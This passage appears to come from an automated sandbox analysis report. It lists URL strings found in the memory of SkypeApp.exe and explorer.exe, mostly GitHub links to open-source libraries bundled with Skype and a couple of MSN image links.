          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/CocoaLumberjack/CocoaLumberjack)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/DefinitelyTyped/DefinitelyTyped
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/DeividasBakanas
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/DovydasNavickas
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Flarna
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Gozala/events)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Hannes-Magnusson-CK
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Maratyszcza/NNPACK)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Microsoft/NoSQLProvider)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Microsoft/ReSub)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Microsoft/ReactXP)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Microsoft/SimpleRestClients)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Microsoft/SubscribableEvent)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Microsoft/SyncTasks)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Microsoft/dotnet/blob/master/releases/UWP/README.md)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Microsoft/react-native-windows)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Microsoft/tslib)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/OfficeDev/office-ui-fabric-react)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/OliverJAsh
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ProjectSeptemberInc/gl-react)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ProjectSeptemberInc/gl-react-native)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Qix-/color)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/STRML/keyMirror)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/SlexAxton/messageformat.js)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Sunnyyoung/SYFlatButton)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/WilcoBakker
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/adjust/react_native_sdk)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/aerofs/react-native-quick-look)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/airbnb/lottie-android)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/airbnb/lottie-ios)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/airbnb/lottie-react-native)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/airbnb/lottie-web)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/airbnb/react-native-maps)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ajafff
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/alinz/react-native-webview-bridge)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/alvis
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/andpor/react-native-sqlite-storage)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/aosp-mirror/platform_development/blob/master/samples/ApiDemos/src/com/example/and
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-archiver)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/bamlab/react-native-image-resizer)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/bitstadium/HockeySDK-Android)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/blueimp/JavaScript-MD5)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/borisyankov/DefinitelyTyped
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/brentvatne/react-native-video)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/browserify/path-browserify)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/chirag04/react-native-tooltip)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/defunctzombie/node-process)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/defunctzombie/node-util)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/devfd/react-native-geocoder)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dfcreative/color-name)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dmnd/dedent)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/reactive)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/eemeli/make-plural.js)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/eps1lon
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/errwischt/stacktrace-parser)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/facebook/SoLoader)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/facebook/conceal)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/facebook/draft-js)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/facebook/fbjs)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/facebook/folly)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/facebook/fresco)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/facebook/immutable-js)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/facebook/metro)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/facebook/prop-types)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/facebook/react)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/facebook/react-native)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/facebook/rebound-js)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/facebook/regenerator/tree/master/packages/regenerator-runtime)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/facebook/yoga)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/facebookarchive/react-native-custom-components)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/facebookincubator/TextLayoutBuilder/)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/faisalman/ua-parser-js)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/feross/buffer)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/feross/ieee754)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/fontello/svgpath)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/fresc81/node-winreg)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/github/fetch)
          Source: SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/googl/5
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/double-conversion/)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/glog)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/grafika)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/gson)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/hnq90/react-native-filesystem-v1)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/hoo29
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ide/react-clone-referenced-element)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/inherits)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jinder/path)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jkomyno
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/joeferraro/react-native-cookies)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jryans/timers-browserify)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/juliangruber/isarray)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/kjin
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/kjur/jsrsasign)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/lelandrichardson/react-native-safe-module)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3460154101.0000016D90D23000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/lodash/lodash
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/lodash/lodash)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/madriska/react-native-quick-actions)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/magicismight/react-native-svg)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/magus/react-native-fxblurview)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/marcshilling/react-native-image-picker)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mathiasbynens/emoji-regex)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/microsoft/testfx)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/microsoft/vstest/)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/moment/moment)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/muaz-khan/RecordRTC)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/muhammaddadu/ifvisible)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mwiktorczyk
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mysticatea/event-target-shim)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/n-e
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/necolas/normalize.css/)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nihgwu/react-native-flanimatedimage/)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodeca/pako)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/oblador/react-native-keychain)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/octo-sniffle
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/open-source-parsers/jsoncpp/)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/opencover/opencover)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/oysteinkrog/SQLite.Net-PCL)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/parambirs
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/phongcao/image-pipeline-windows)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pusherman/react-native-network-info)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pvorb/node-clone)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/qix-/color-convert)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/qix-/color-string)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/react-native-community/react-native-linear-gradient)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/reactjs/react-timer-mixin)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rhaker/react-native-record-audio-ios#cbd294f5ca2ff6c21926326a8a110aa1136640e9)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rt2zz/react-native-contacts)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sebmarkbage/art)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/seegno/google-libphonenumber)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/serkanyersen/ifvisible.js/)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sindresorhus/escape-string-regexp)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sindresorhus/object-assign)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/slowpath/react-native-hockeyapp)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/smac89
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sqlcipher/android-database-sqlcipher)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sqlcipher/sqlcipher.git)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/square/leakcanary)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/square/okhttp)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/square/okio)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tellnes
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/then/promise)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/vvakame
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/wasabeef/Blurry/)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/webpack/node-libs-browser)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/wwwy3y3
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/xianyi/OpenBLAS)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/yqritc/Android-ScalableVideoView)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/zbtang/React-Native-ViewPager)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/zertosh/invariant)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/zeux/pugixml)
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
